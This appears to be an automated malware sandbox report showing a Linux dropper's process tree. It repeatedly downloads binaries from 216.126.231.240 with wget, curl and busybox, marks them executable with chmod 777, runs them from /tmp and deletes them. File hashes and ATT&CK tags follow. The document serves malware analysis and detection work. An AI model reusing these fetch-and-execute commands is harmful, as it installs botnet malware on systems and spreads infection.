/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:951
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:952
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:954
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:957
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:958
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:961
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:967
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:971
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97